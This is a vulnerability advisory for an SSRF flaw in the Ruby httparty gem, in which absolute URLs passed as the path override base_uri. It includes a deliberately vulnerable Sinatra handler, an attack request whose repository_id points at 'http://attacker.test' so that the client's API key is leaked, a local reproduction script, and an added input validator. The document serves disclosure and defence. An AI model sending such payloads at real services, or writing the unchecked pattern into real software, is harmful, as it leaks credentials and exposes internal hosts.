PT-2025-54707 · Rubygems · Httparty

Published

2025-12-23

·

Updated

2025-12-23

CVSS v3.1

8.2

High

Vector

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Summary

httparty's handling of absolute URLs passed as the path argument can lead to SSRF. An attacker who controls the path can redirect a request, together with any API keys configured on the client, to a host of their choosing, and can also make the application issue requests to internal servers.

Details

When httparty receives a path argument that is an absolute URL (a value carrying its own scheme and host), it ignores the configured base_uri and sends the request to that URL as-is. As a result, if a malicious user can control the path value, the application may unintentionally communicate with a host that the programmer did not anticipate, and any headers or credentials configured on the client class travel with that request.
Consider the following example of a web application:
```rb
require 'sinatra'
require 'sinatra/json'   # provides the json helper (sinatra-contrib)
require 'json'
require 'httparty'

class RepositoryClient
  include HTTParty
  base_uri 'http://example.test/api/v1/repositories/'
  headers 'X-API-KEY' => '1234567890'
end

post '/issue' do
  request_body = JSON.parse(request.body.read)
  # Vulnerable: repository_id is passed unchecked as the path, so an absolute URL replaces base_uri.
  RepositoryClient.get(request_body['repository_id']).body
  # do something
  json message: 'OK'
end
```
Now, suppose an attacker sends a request like this:
```
POST /issue HTTP/1.1
Host: localhost:10000
Content-Type: application/json

{
  "repository_id": "http://attacker.test",
  "title": "test"
}
```
In this case, because the supplied value is an absolute URL, httparty discards base_uri and sends the request, X-API-KEY header included, to http://attacker.test instead of http://example.test.
A similar problem was reported and fixed in the HTTP client library axios in the past: https://github.com/axios/axios/issues/6463
Also, Python's urljoin function has documented a warning about similar behavior: https://docs.python.org/3.13/library/urllib.parse.html#urllib.parse.urljoin
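The check that belongs between user input and a call such as RepositoryClient.get, shown as an added example that is not part of the advisory or of httparty's own code. It uses only Ruby's standard uri library; BASE_URI, REPOSITORY_ID_PATTERN and the function names are assumptions chosen for the illustration, and URI.join is used here only to show where RFC 3986 reference resolution (the same rule behind Python's urljoin) sends a given input, not as a model of httparty's internals. It rejects the advisory's absolute-URL case as well as the protocol-relative (//host) and ../ escape variants, and re-checks the resolved origin as a post-condition.

```ruby
require 'uri'

# Assumed stand-in for the advisory's base_uri; example code, not HTTParty's.
BASE_URI = URI.parse('http://example.test/api/v1/repositories/')

# Repository IDs in this hypothetical API are short opaque tokens. The allowlist is
# the primary control; the structural checks below are defence in depth.
REPOSITORY_ID_PATTERN = /\A[A-Za-z0-9][A-Za-z0-9_.-]{0,63}\z/

class UnsafePathError < StandardError; end

# Returns nil when `path` stays inside BASE_URI after RFC 3986 reference
# resolution (what URI.join implements), otherwise a symbol naming why the
# value must not be handed to an HTTP client.
def path_problem(path)
  candidate = URI.parse(path)
  return :absolute_url unless candidate.relative?  # "http://attacker.test" replaces the base outright
  return :host_in_path if candidate.host           # "//attacker.test/x" keeps the scheme, swaps the host

  resolved = URI.join(BASE_URI, path)
  same_origin = resolved.scheme == BASE_URI.scheme &&
                resolved.host == BASE_URI.host &&
                resolved.port == BASE_URI.port
  return :wrong_origin unless same_origin          # post-condition; unreachable after the checks above
  return :escaped_base_path unless resolved.path.start_with?(BASE_URI.path)  # "../../../admin"
  nil
rescue URI::InvalidURIError
  :unparseable
end

# Builds the URL for one repository, or raises. Only the returned string should
# ever reach a call such as RepositoryClient.get.
def repository_url(repository_id)
  raise UnsafePathError, 'repository_id must be a String' unless repository_id.is_a?(String)
  unless REPOSITORY_ID_PATTERN.match?(repository_id)
    raise UnsafePathError, "repository_id #{repository_id.inspect} fails the allowlist"
  end
  problem = path_problem(repository_id)
  raise UnsafePathError, "repository_id #{repository_id.inspect}: #{problem}" if problem

  URI.join(BASE_URI, repository_id).to_s
end

def safe_repository_id?(repository_id)
  repository_url(repository_id)
  true
rescue UnsafePathError
  false
end

if __FILE__ == $PROGRAM_NAME
  # Constructed inputs: the advisory's attacker value plus the usual variants.
  ['42', 'http://attacker.test', '//attacker.test/x', '../../../admin',
   'http://example.test@attacker.test/'].each do |input|
    verdict = if safe_repository_id?(input)
                repository_url(input)
              else
                "rejected (#{path_problem(input) || 'allowlist'})"
              end
    puts format('%-40s -> %s', input.inspect, verdict)
  end
end
```

In the Sinatra handler above, `RepositoryClient.get(repository_url(request_body['repository_id']))` (with a rescue that returns a 4xx for UnsafePathError) closes the hole; the allowlist alone would already do so for this API, while path_problem documents what each structural check catches if the allowlist is later loosened.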

PoC

Follow these steps to reproduce the issue:
  1. Set up two simple HTTP servers.
```bash
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
```
  2. Create a script (for example, main.rb):
```rb
require 'httparty'

class Client
  include HTTParty
  base_uri 'http://localhost:10001'
end

# The path is an absolute URL, so httparty uses it as-is and base_uri plays no part.
data = Client.get('http://localhost:10002').body
puts data
```
  3. Run the script:
```bash
$ ruby main.rb
this is server2
```
Although base_uri is set to http://localhost:10001, httparty sends the request to http://localhost:10002/.

Impact

  • Leakage of credentials: If an absolute URL is provided, any API keys or credentials configured on the httparty client (for example via headers or basic_auth) are sent to the unintended third-party host.
  • SSRF (Server-Side Request Forgery): Attackers can force the httparty-based program to send requests to other internal hosts within the network where the program is running.
  • Affected users: Any software that configures base_uri and passes an insufficiently validated value as the path parameter may be affected by this issue.

Exploit

Fix

Weakness Enumeration

SSRF

Related Identifiers

GHSA-HM5P-X4RQ-38W4

Affected Products

Httparty